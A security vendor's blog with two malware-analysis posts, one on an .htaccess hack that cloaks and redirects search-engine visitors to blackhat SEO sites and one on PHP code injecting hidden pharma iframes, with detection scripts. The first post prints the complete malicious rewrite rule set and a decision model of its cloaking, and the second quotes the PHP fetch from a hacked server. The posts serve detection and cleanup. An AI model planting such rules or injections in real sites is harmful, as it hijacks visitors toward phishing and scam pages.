Friday, May 23, 2014

Htaccess Hack Serving BlackHat SEO

Search Engine Traffic Hijacking

We clean infected websites on a daily basis, and the most common question we are asked is how to identify search engine traffic hijacking before the website is infected further and Google (or Yahoo, Bing or any other search engine) blacklists it. Blacklisting is usually how a website owner first notices that the site has been compromised.

The first thing to check is the .htaccess file, which can be used to redirect traffic arriving from search engines to a hijacker's website. If your website has been hacked this way, a visitor who finds your site on a search engine and clicks the link is redirected to the hijacker's website instead of yours, while a visitor who types the address directly sees nothing unusual.

How to find Search Engine Traffic Hijacking?

If you are experiencing traffic hijacking, most likely your .htaccess file has been updated with malicious code, or new .htaccess files have been planted across your sub-directories.

Search for .htaccess files in the web root and in all sub-directories, and check each one for suspicious directives: redirects to external URLs, and conditions on HTTP_REFERER, HTTP_USER_AGENT or HTTP_COOKIE that you did not add yourself.

The most common way to hijack search engine traffic is to append malicious directives to an existing .htaccess file. The site keeps working normally for the owner, who rarely arrives through a search result, so nothing looks wrong.

The other way is to wipe out the existing .htaccess file and replace it with one containing only the malicious directives.
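The search described above, as an added example that is not code from the original post: a small Python script that walks a web root, lists every .htaccess it finds (including freshly planted ones in directories that never needed one) and flags directives typical of traffic hijacking. The indicator regexes are this example's own, derived from the sample later in this post; the two sample .htaccess bodies are constructed for the demo, the malicious one being a shortened imitation of the post's sample. A hit means "review this file", not "this file is infected".

```python
#!/usr/bin/env python3
"""Added example (not code from the original post): walk a web root, list every
.htaccess file, and flag directives typical of search-engine traffic hijacking.

The indicator regexes are this example's own, derived from the sample in the
post; a hit means "review this file", not "this file is infected".  The two
sample .htaccess bodies are constructed for the demo.
"""
from __future__ import annotations

import re
import tempfile
import time
from pathlib import Path

# label -> regex.  Each is searched case-insensitively over the whole file.
INDICATORS = {
    # condition on the referer naming a search engine
    "referer-is-search-engine": re.compile(
        r"HTTP_REFERER.*(google|yahoo|bing|msn|yandex|aol|lycos|rambler)", re.I),
    # RewriteRule whose target is an absolute URL and that carries the R flag
    "offsite-redirect": re.compile(
        r"RewriteRule\s+\S+\s+https?://\S+\s+\[[^\]]*\bR\b", re.I),
    # rules that look at or set a cookie (once-per-visitor redirects)
    "cookie-gated-rule": re.compile(r"HTTP_COOKIE", re.I),
    "cookie-set-by-rule": re.compile(r"\[[^\]]*\bCO=", re.I),
    # negated user-agent conditions that skip crawlers (cloaking)
    "crawler-exclusion": re.compile(
        r"HTTP_USER_AGENT\}?\s+!.*(bot|spider|crawl|google|yahoo|bing|slurp)", re.I),
    # other common .htaccess tricks
    "errordocument-to-url": re.compile(r"ErrorDocument\s+\d+\s+https?://", re.I),
    "php-auto-prepend": re.compile(r"auto_(prepend|append)_file", re.I),
}


def check_htaccess(text: str) -> list[str]:
    """Labels of every indicator that matches somewhere in TEXT."""
    return [label for label, rx in INDICATORS.items() if rx.search(text)]


def scan_webroot(root, recent_days: int = 7):
    """Yield (path, labels, modified_recently) for each .htaccess under ROOT.

    Clean files are reported too: a brand-new .htaccess in a directory that
    never had one (uploads, images, ...) is itself worth a look.
    """
    cutoff = time.time() - recent_days * 86400
    for path in sorted(Path(root).rglob(".htaccess")):
        if path.is_file():
            labels = check_htaccess(path.read_text(errors="replace"))
            yield str(path), labels, path.stat().st_mtime >= cutoff


# Constructed sample: a stock WordPress .htaccess.
CLEAN_SAMPLE = r"""# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
"""

# Constructed sample: shortened imitation of the hijacking rule set in the post.
MALICIOUS_SAMPLE = r"""RewriteEngine On
RewriteCond %{REQUEST_METHOD} ^GET$
RewriteCond %{HTTP_REFERER} ^(http\:\/\/)?([^\/\?]*\.)?(google\.|yahoo\.|bing\.).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(bot|spider|Crawl|Google).*$ [NC]
RewriteCond %{HTTP_COOKIE} !^.*xccgtswgokoe.*$
RewriteCond %{HTTPS} ^off$
RewriteRule ^(.*)$ http://url-to-malicious-site.com/cgi-bin/r.cgi?h=%{HTTP_HOST}&u=%{REQUEST_URI} [R=302,L,CO=xccgtswgokoe:1:%{HTTP_HOST}:10080:/:0:HttpOnly]
"""


def demo() -> list[tuple[str, list[str], bool]]:
    """Write the two samples into a temporary web root and scan it."""
    with tempfile.TemporaryDirectory() as root:
        Path(root, ".htaccess").write_text(CLEAN_SAMPLE)
        planted = Path(root, "wp-content", "uploads")
        planted.mkdir(parents=True)
        (planted / ".htaccess").write_text(MALICIOUS_SAMPLE)
        results = list(scan_webroot(root))
    for path, labels, recent in results:
        flag = "SUSPECT" if labels else "ok     "
        age = "  (modified in the last 7 days)" if recent else ""
        print(f"{flag} {path}{age}")
        for label in labels:
            print(f"          - {label}")
    return results


if __name__ == "__main__":
    demo()
```

Run it against a real site with `scan_webroot("/var/www/html")`. Expect some benign hits: a canonical www redirect trips "offsite-redirect", and hotlink protection that names google in an HTTP_REFERER condition trips the referer indicator. Those take seconds to confirm; what you are looking for is a rule set you never wrote, especially one combining a search-engine referer, a crawler exclusion and a cookie.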

Here is an example from a very popular website that we cleaned up recently. The malicious code was in place for only a short time, yet that was enough to get the site blacklisted by Google, which is how the administrator noticed it. Nearly 99% of the website's traffic was being redirected to other URLs.

Malware Investigation

External investigation of the website with the online remote malware scanner detected:
  1. Traffic redirected to a malicious site
  2. Every HTML page contained a hidden iframe pointing to a malicious IP address, inserted as the last line of the body element
Investigation of the .htaccess files showed that the infection added a temporary redirect (302) to numerous URLs, some of which were already blacklisted by Google.




Hacked .htaccess file body example (the attacker's host is shown as url-to-malicious-site.com):

  RewriteEngine On
  RewriteCond %{REQUEST_METHOD}   ^GET$
  RewriteCond %{HTTP_REFERER}     ^(http\:\/\/)?([^\/\?]*\.)?(google\.|yahoo\.|bing\.|msn\.|yandex\.|ask\.|excite\.|altavista\.|netscape\.|aol\.|hotbot\.|goto\.|infoseek\.|mamma\.|alltheweb\.|lycos\.|search\.|metacrawler\.|rambler\.|mail\.|dogpile\.|ya\.|\/search\?).*$   [NC]
  RewriteCond %{HTTP_REFERER}     !^.*(q\=cache\:).*$   [NC]
  RewriteCond %{HTTP_USER_AGENT}  !^.*(bing|Accoona|Ace\sExplorer|Amfibi|Amiga\sOS|apache|appie|AppleSyndication).*$   [NC]
  RewriteCond %{HTTP_USER_AGENT}  !^.*(Archive|Argus|Ask\sJeeves|asterias|Atrenko\sNews|BeOS|BigBlogZoo).*$   [NC]
  RewriteCond %{HTTP_USER_AGENT}  !^.*(Biz360|Blaiz|Bloglines|BlogPulse|BlogSearch|BlogsLive|BlogsSay|blogWatcher).*$   [NC]
  RewriteCond %{HTTP_USER_AGENT}  !^.*(Bookmark|bot|CE\-Preload|CFNetwork|cococ|Combine|Crawl|curl|Danger\shiptop).*$   [NC]
  RewriteCond %{HTTP_USER_AGENT}  !^.*(Diagnostics|DTAAgent|ecto|EmeraldShield|endo|Evaal|Everest\-Vulcan).*$   [NC]
  RewriteCond %{HTTP_USER_AGENT}  !^.*(exactseek|Feed|Fetch|findlinks|FreeBSD|Friendster|Fuck\sYou|Google).*$   [NC]
  RewriteCond %{HTTP_USER_AGENT}  !^.*(Gregarius|HatenaScreenshot|heritrix|HolyCowDude|Honda\-Search|HP\-UX).*$   [NC]
  RewriteCond %{HTTP_USER_AGENT}  !^.*(HTML2JPG|HttpClient|httpunit|ichiro|iGetter|iPhone|IRIX|Jakarta|JetBrains).*$   [NC]
  RewriteCond %{HTTP_USER_AGENT}  !^.*(Krugle|Labrador|larbin|LeechGet|libwww|Liferea|LinkChecker).*$   [NC]
  RewriteCond %{HTTP_USER_AGENT}  !^.*(LinknSurf|Linux|LiveJournal|Lonopono|Lotus\-Notes|Lycos|Lynx|Mac\_PowerPC).*$   [NC]
  RewriteCond %{HTTP_USER_AGENT}  !^.*(Mac\_PPC|Mac\s10|like\sMac\sOS|macDN|Mediapartners|Megite|MetaProducts).*$   [NC]
  RewriteCond %{HTTP_USER_AGENT}  !^.*(Miva|Mobile|NetBSD|NetNewsWire|NetResearchServer|NewsAlloy|NewsFire).*$   [NC]
  RewriteCond %{HTTP_USER_AGENT}  !^.*(NewsGatorOnline|NewsMacPro|Nokia|NuSearch|Nutch|ObjectSearch|Octora).*$   [NC]
  RewriteCond %{HTTP_USER_AGENT}  !^.*(OmniExplorer|Omnipelagos|Onet|OpenBSD|OpenIntelligenceData|oreilly).*$   [NC]
  RewriteCond %{HTTP_USER_AGENT}  !^.*(os\=Mac|P900i|panscient|perl|PlayStation|POE\-Component|PrivacyFinder).*$   [NC]
  RewriteCond %{HTTP_USER_AGENT}  !^.*(psycheclone|Python|retriever|Rojo|RSS|SBIder|Scooter|Seeker|Series\s60).*$   [NC]
  RewriteCond %{HTTP_USER_AGENT}  !^.*(SharpReader|SiteBar|Slurp|Snoopy|Soap\sClient|Socialmarks|Sphere\sScout).*$   [NC]
  RewriteCond %{HTTP_USER_AGENT}  !^.*(spider|sproose|Rambler|Straw|subscriber|SunOS|Surfer|Syndic8).*$   [NC]
  RewriteCond %{HTTP_USER_AGENT}  !^.*(Syntryx|TargetYourNews|Technorati|Thunderbird|Twiceler|urllib|Validator).*$   [NC]
  RewriteCond %{HTTP_USER_AGENT}  !^.*(Vienna|voyager|W3C|Wavefire|webcollage|Webmaster|WebPatrol|wget|Win\s9x).*$   [NC]
  RewriteCond %{HTTP_USER_AGENT}  !^.*(Win16|Win95|Win98|Windows\s95|Windows\s98|Windows\sCE|Windows\sNT\s4).*$   [NC]
  RewriteCond %{HTTP_USER_AGENT}  !^.*(WinHTTP|WinNT4|WordPress|WWWeasel|wwwster|yacy|Yahoo).*$   [NC]
  RewriteCond %{HTTP_USER_AGENT}  !^.*(Yandex|Yeti|YouReadMe|Zhuaxia|ZyBorg).*$   [NC]
  RewriteCond %{HTTP_COOKIE}      !^.*xccgtswgokoe.*$
  RewriteCond %{HTTPS}            ^off$
  RewriteRule ^(.*)$   http://url-to-malicious-site.com/cgi-bin/r.cgi?p=10003&i=36c7c8b3&j=333&m=649f84aa2d951f8f26df403fb179cdea&h=%{HTTP_HOST}&u=%{REQUEST_URI}&q=%{QUERY_STRING}&t=%{TIME}  [R=302,L,CO=xccgtswgokoe:1:%{HTTP_HOST}:10080:/:0:HttpOnly]

Payload

The execution algorithm can be described as follows.

When Apache handles an HTTP GET request, IF the visitor's:
  1. Referer is a search engine (see the list below) and is not a search-engine cache view (the referer does not contain "q=cache:")
  2. User agent does not contain any of the strings in the table below
  3. Cookie header does not contain the string "xccgtswgokoe"
  4. Connection is plain HTTP (%{HTTPS} is "off")
THEN
  1. Redirect the visitor with a 302 to "http://url-to-malicious-site.com/cgi-bin/r.cgi?p=10003&i=36c7c8b3&j=333&m=649f84aa2d951f8f26df403fb179cdea&...", with the victim's host name, request URI, query string and the time appended as parameters
  2. Set the cookie "xccgtswgokoe=1" for the victim's host (the CO= flag: domain %{HTTP_HOST}, lifetime 10080 minutes, i.e. 7 days, path /, not Secure, HttpOnly)

Two details matter for anyone trying to confirm the infection. The cookie means each browser is redirected at most once a week, so the redirect is hard to reproduce on a second visit unless cookies are cleared. The user-agent exclusions cover crawlers and tools (Google, bing, Yahoo, Yandex, Slurp, bot, spider, Crawl, curl, wget and so on), so search engines keep indexing the legitimate page while real visitors are sent away; they also skip Linux, the BSDs, PowerPC Macs, iPhone and "Mobile" clients and Windows versions older than XP, so the redirect is aimed at current desktop browsers.
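To make the cloaking concrete, here is an added example that is not part of the original post: a Python model of the decision the rule set above makes, exercised with a handful of constructed requests. The referer, cache, cookie and HTTPS patterns are transcribed from the sample; the User-Agent exclusion list is an abbreviated subset of the 162 tokens in the sample. The host names, function names and sample requests are this example's own assumptions.

```python
#!/usr/bin/env python3
"""Added example (not from the original post): a Python model of the decision
made by the hijacking .htaccess, so the cloaking can be exercised with
concrete requests and no Apache server.

Referer, cache, cookie and HTTPS patterns are transcribed from the sample;
EXCLUDED_UA is an abbreviated subset of the sample's 162 user-agent tokens.
Host names, function names and sample requests are this example's own.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

COOKIE_NAME = "xccgtswgokoe"      # cookie name from the sample
COOKIE_LIFETIME_MIN = 10080       # CO= lifetime is in minutes: 7 days

# RewriteCond %{HTTP_REFERER} ^(http://)?([^/?]*\.)?(google\.|...|/search\?).*$ [NC]
SEARCH_REFERER = re.compile(
    r"^(http://)?([^/?]*\.)?(google\.|yahoo\.|bing\.|msn\.|yandex\.|ask\.|excite\.|"
    r"altavista\.|netscape\.|aol\.|hotbot\.|goto\.|infoseek\.|mamma\.|alltheweb\.|"
    r"lycos\.|search\.|metacrawler\.|rambler\.|mail\.|dogpile\.|ya\.|/search\?).*$",
    re.I)
# RewriteCond %{HTTP_REFERER} !^.*(q\=cache\:).*$ [NC]  (skip cache views)
CACHE_REFERER = re.compile(r"q=cache:", re.I)
# Subset of the negated HTTP_USER_AGENT conditions: crawlers, tools and
# platforms the attacker does not want to redirect.
EXCLUDED_UA = re.compile(
    r"(bing|bot|Crawl|curl|Google|Slurp|spider|wget|Yahoo|Yandex|libwww|Python|"
    r"Linux|FreeBSD|Mac_PowerPC|like Mac OS|iPhone|Mobile|Win95|Win98|Windows NT 4)",
    re.I)


@dataclass
class Request:
    method: str = "GET"
    host: str = "www.victim-site.example"   # assumed victim host name
    uri: str = "/"
    referer: str = ""
    user_agent: str = ""
    cookie: str = ""
    https: bool = False


def hijack_decision(req: Request) -> tuple[bool, str]:
    """Walk the RewriteCond chain in order; return (redirected?, reason)."""
    if req.method != "GET":
        return False, "not a GET"
    if not SEARCH_REFERER.search(req.referer):
        return False, "referer is not a search engine"
    if CACHE_REFERER.search(req.referer):
        return False, "search-engine cache view"
    if EXCLUDED_UA.search(req.user_agent):
        return False, "user agent is excluded (crawler, tool or unwanted platform)"
    if COOKIE_NAME in req.cookie:
        return False, "already redirected within the cookie lifetime"
    if req.https:
        return False, "request is over HTTPS"
    return True, "all conditions met: 302 to attacker URL"


def hijack_response(req: Request) -> dict[str, str]:
    """Headers the RewriteRule emits for a redirected request.

    url-to-malicious-site.com is the post's placeholder for the attacker host.
    Set-Cookie mirrors the CO= flag (value 1, victim domain, 10080 minutes,
    path /, not Secure, HttpOnly); the lifetime is expressed as Max-Age here.
    """
    location = (f"http://url-to-malicious-site.com/cgi-bin/r.cgi"
                f"?h={req.host}&u={req.uri}")
    cookie = (f"{COOKIE_NAME}=1; Domain={req.host}; Path=/; "
              f"Max-Age={COOKIE_LIFETIME_MIN * 60}; HttpOnly")
    return {"Status": "302 Found", "Location": location, "Set-Cookie": cookie}


# Constructed requests (user-agent strings are typical 2014 values).
GOOGLE_SEARCH = "http://www.google.com/search?q=victim+site"
CHROME_WIN7 = ("Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 "
               "(KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36")
GOOGLEBOT = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
FIREFOX_LINUX = "Mozilla/5.0 (X11; Linux x86_64; rv:29.0) Gecko/20100101 Firefox/29.0"

SCENARIOS = {
    "owner types the URL directly": Request(user_agent=CHROME_WIN7),
    "Googlebot sent with a search referer": Request(referer=GOOGLE_SEARCH, user_agent=GOOGLEBOT),
    "Windows Chrome user arriving from Google": Request(referer=GOOGLE_SEARCH, user_agent=CHROME_WIN7),
    "same user, second visit this week": Request(referer=GOOGLE_SEARCH, user_agent=CHROME_WIN7,
                                                 cookie=f"{COOKIE_NAME}=1"),
    "Linux Firefox user arriving from Google": Request(referer=GOOGLE_SEARCH, user_agent=FIREFOX_LINUX),
    "Windows Chrome user arriving over HTTPS": Request(referer=GOOGLE_SEARCH, user_agent=CHROME_WIN7,
                                                       https=True),
}


def run_scenarios() -> dict[str, bool]:
    """Evaluate every scenario, print the verdict, return {name: redirected}."""
    results = {}
    for name, req in SCENARIOS.items():
        redirected, why = hijack_decision(req)
        results[name] = redirected
        print(f"{'REDIRECT' if redirected else 'serve   '}  {name}: {why}")
        if redirected:
            for header, value in hijack_response(req).items():
                print(f"            {header}: {value}")
    return results


if __name__ == "__main__":
    run_scenarios()
```

The scenarios show why the owner never sees the problem: a direct visit, a crawler, a second visit inside the seven-day cookie window and an HTTPS visit are all served the normal page. To reproduce the redirect against a live site, send a single plain-HTTP request with a Google referer, a current Windows desktop user agent and no cookies, for instance with curl and its `-e` and `-A` options, and look for the 302 and the Set-Cookie header.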

List of monitored search engines (the referer host contains one of these names, or the referer contains "/search?"):
  1. http://google.*
  2. http://yahoo.*
  3. http://bing.*
  4. http://msn.*
  5. http://yandex.*
  6. http://ask.*
  7. http://excite.*
  8. http://altavista.*
  9. http://netscape.*
  10. http://aol.*
  11. http://hotbot.*
  12. http://goto.*
  13. http://infoseek.*
  14. http://mamma.*
  15. http://alltheweb.*
  16. http://lycos.*
  17. http://search.*
  18. http://metacrawler.*
  19. http://rambler.*
  20. http://mail.*
  21. http://dogpile.*
  22. http://ya.*


The redirect is skipped when the User-Agent header contains any of the following strings (matched case-insensitively; \s, \- and \_ stand for a space, a hyphen and an underscore, as written in the regexes):

  1. Accoona
  2. Ace\sExplorer
  3. Amfibi
  4. Amiga\sOS
  5. AppleSyndication
  6. Archive
  7. Argus
  8. Ask\sJeeves
  9. Atrenko\sNews
  10. BeOS
  11. BigBlogZoo
  12. Biz360
  13. Blaiz
  14. BlogPulse
  15. BlogSearch
  16. Bloglines
  17. BlogsLive
  18. BlogsSay
  19. Bookmark
  20. CE\-Preload
  21. CFNetwork
  22. Combine
  23. Crawl
  24. DTAAgent
  25. Danger\shiptop
  26. Diagnostics
  27. EmeraldShield
  28. Evaal
  29. Everest\-Vulcan
  30. Feed
  31. Fetch
  32. FreeBSD
  33. Friendster
  34. Fuck\sYou
  35. Google
  36. Gregarius
  37. HP\-UX
  38. HTML2JPG
  39. HatenaScreenshot
  40. HolyCowDude
  41. Honda\-Search
  42. HttpClient
  43. IRIX
  44. Jakarta
  45. JetBrains
  46. Krugle
  47. Labrador
  48. LeechGet
  49. Liferea
  50. LinkChecker
  51. LinknSurf
  52. Linux
  53. LiveJournal
  54. Lonopono
  55. Lotus\-Notes
  56. Lycos
  57. Lynx
  58. Mac\_PPC
  59. Mac\_PowerPC
  60. Mac\s10
  61. Mediapartners
  62. Megite
  63. MetaProducts
  64. Miva
  65. Mobile
  66. NetBSD
  67. NetNewsWire
  68. NetResearchServer
  69. NewsAlloy
  70. NewsFire
  71. NewsGatorOnline
  72. NewsMacPro
  73. Nokia
  74. NuSearch
  75. Nutch
  76. ObjectSearch
  77. Octora
  78. OmniExplorer
  79. Omnipelagos
  80. Onet
  81. OpenBSD
  82. OpenIntelligenceData
  83. Python
  84. RSS
  85. Rambler
  86. Rojo
  87. SBIder
  88. Scooter
  89. Seeker
  90. Series\s60
  91. SharpReader
  92. SiteBar
  93. Slurp
  94. Snoopy
  95. Soap\sClient
  96. Socialmarks
  97. Sphere\sScout
  98. Straw
  99. SunOS
  100. Surfer
  101. Syndic8
  102. Syntryx
  103. TargetYourNews
  104. Technorati
  105. Thunderbird
  106. Twiceler
  107. Validator
  108. Vienna
  109. W3C
  110. WWWeasel
  111. Wavefire
  112. WebPatrol
  113. Webmaster
  114. Win16
  115. Win95
  116. Win98
  117. WinHTTP
  118. WinNT4
  119. Win\s9x
  120. Windows\s95
  121. Windows\s98
  122. Windows\sCE
  123. Windows\sNT\s4
  124. WordPress
  125. Yahoo
  126. Yandex
  127. Yeti
  128. YouReadMe
  129. Zhuaxia
  130. ZyBorg
  131. apache
  132. appie
  133. asterias
  134. bing
  135. blogWatcher
  136. bot
  137. cococ
  138. curl
  139. ecto
  140. endo
  141. exactseek
  142. findlinks
  143. heritrix
  144. httpunit
  145. iGetter
  146. iPhone
  147. ichiro
  148. larbin
  149. libwww
  150. macDN
  151. oreilly
  152. psycheclone
  153. retriever
  154. spider
  155. sproose
  156. subscriber
  157. urllib
  158. voyager
  159. webcollage
  160. wget
  161. wwwster
  162. yacy


Summary

The hijacked traffic was redirected to the usual blackhat SEO destinations: pills/pharma, phishing, cash loans, pay-per-click providers, bag sales and so on. In short, the attack was designed to hijack traffic and redirect it to whatever websites the attacker defined.

Website Malware Scanning And Malware Clean-Up


Uncovering online threats and hidden malware is easy and effective with the Online Malware Scanner. If you suspect that your website was infected, select one of the Malware Removal & Monitoring Plans for malware removal.

Alternatively, you can try to remove such malware yourself using Quttera's website malware scan report and by manually investigating your site's .htaccess file(s). A few important things to remember: use SFTP rather than FTP, take a backup before making changes, change your password(s) and, of course, submit your website(s) for re-testing and for removal from the blacklist if needed.

Thursday, May 8, 2014

PHP Code Injecting JavaScript Malware To Redirect To Pharma Sites

How Couple Of Compromised Servers Are Used For BlackHat Pharma SEO

Our malware analysts recently finished cleaning up the hacked site of a ThreatSign (anti-malware service) customer. We decided it was worth a post to help others with malware research and prevention.

Malware execution diagram


We were contacted by a webmaster whose site had been blacklisted by Google. In addition to the blacklisting, an external scan for malware showed numerous hidden iframes in the scanned HTML file(s).

After manual investigation of the files on site.cc (we can't provide the real name of the customer site), it appeared that all index.php files were infected with PHP malware. On each request to this server, the malicious PHP code made a request to another server:
__url_get_contents(http://hacked-server-url/_vti_bin/tky4df82.php, 1);
The output of this call was a fragment of JavaScript whose src attribute had the visitor's IP address appended as a parameter (id=XXXXX):
<script type="text/javascript" src="'returned-url'?id=XXXXX"></script>
Digging further on the server the call was made to, it turned out to be hosting a PHP proxy module at /_vti_bin/tky4df82.php. The JavaScript it finally served to our customer's visitors (and most probably to those of many other sites) generated the hidden iframes pointing to pharmaceutical sites. It even had localization settings, so the visitor got the site in the language matching the geolocation of their IP address.

The full PHP code was uploaded to pastebin, in case you encounter a similar issue: http://pastebin.com/ThYzmrfv
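Both posts describe the same symptom in the served HTML: a hidden iframe (in the first post as the last line of the body, here generated by injected JavaScript) and a script tag loading from a server that is not the site's own. Here is an added example that is not code from either post: a Python checker built on the standard library's html.parser that reports iframes made invisible (zero or one pixel size, display:none, visibility:hidden, off-screen positioning) and script tags whose src host is not a sub-domain of the page's own domain. The sample page and every host name in it are constructed for this example; the hacked-server-url/_vti_bin path only echoes the placeholder used in this post.

```python
#!/usr/bin/env python3
"""Added example (not code from either post): scan an HTML page for the two
kinds of injected markup the posts describe: iframes made invisible and
<script src> tags loading from a host that is not the site's own.

The sample page and all host names are constructed for this example; the
hacked-server-url/_vti_bin path echoes the placeholder used in the post.
"""
from __future__ import annotations

import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# inline CSS that hides an element: display/visibility, 0/1 px size, off-screen
HIDDEN_STYLE = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden|"
    r"(width|height)\s*:\s*[01](px|em|%)?\s*(;|$)|"
    r"(left|top)\s*:\s*-\d{3,}", re.I)


def _tiny(value: str | None) -> bool:
    """True for a width/height attribute of 0 or 1, with or without 'px'."""
    return value is not None and re.fullmatch(r"\s*[01](px)?\s*", value) is not None


def _same_site(host: str, page_host: str) -> bool:
    """Treat sub-domains of the page's registrable domain as first party.

    Assumes a one-label public suffix; example.co.uk-style domains need more.
    """
    base = ".".join(page_host.lower().split(".")[-2:])
    host = host.lower()
    return host == base or host.endswith("." + base)


class InjectionFinder(HTMLParser):
    """Collects (kind, line, detail) for hidden iframes and third-party scripts."""

    def __init__(self, page_host: str):
        super().__init__()
        self.page_host = page_host
        self.findings: list[tuple[str, int, str]] = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        line = self.getpos()[0]          # 1-based line of the start tag
        if tag == "iframe":
            hidden = (_tiny(a.get("width")) or _tiny(a.get("height"))
                      or HIDDEN_STYLE.search(a.get("style") or "") is not None)
            if hidden:
                self.findings.append(("hidden-iframe", line, a.get("src") or ""))
        elif tag == "script" and a.get("src"):
            host = urlsplit(a["src"]).hostname   # None for relative paths
            if host and not _same_site(host, self.page_host):
                self.findings.append(("external-script", line, a["src"]))


def find_injections(html: str, page_host: str) -> list[tuple[str, int, str]]:
    """Parse HTML (as served to a browser) and return the suspicious tags."""
    parser = InjectionFinder(page_host)
    parser.feed(html)
    parser.close()
    return parser.findings


# Constructed sample page: one first-party CDN script, one visible partner
# iframe, then the two injected tags at the end of the body.
SAMPLE_PAGE = """<!DOCTYPE html>
<html><head><title>Shop</title>
<script src="/js/app.js"></script>
<script src="http://cdn.victim-site.example/jquery.js"></script>
</head>
<body>
<h1>Welcome</h1>
<iframe src="http://partner.example/widget" width="300" height="200"></iframe>
<script type="text/javascript" src="http://hacked-server-url/_vti_bin/tky4df82.php?id=203.0.113.7"></script>
<iframe src="http://198.51.100.23/in.php" width="1" height="1" style="visibility:hidden"></iframe>
</body></html>
"""


def demo() -> list[tuple[str, int, str]]:
    findings = find_injections(SAMPLE_PAGE, "www.victim-site.example")
    for kind, line, detail in findings:
        print(f"line {line:3d}  {kind:16s} {detail}")
    return findings


if __name__ == "__main__":
    demo()
```

Feed it the HTML a browser actually receives (fetched with a desktop user agent, since cloaked malware serves clean pages to tools), not the PHP source on disk: here the iframe never appears in any file, it is produced at request time by the injected script.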

Malware clean-up



Alternatively, you can try to remove the malware yourself using Quttera's website scan report. Don't forget to submit your website(s) for re-testing and for removal from the blacklist if needed.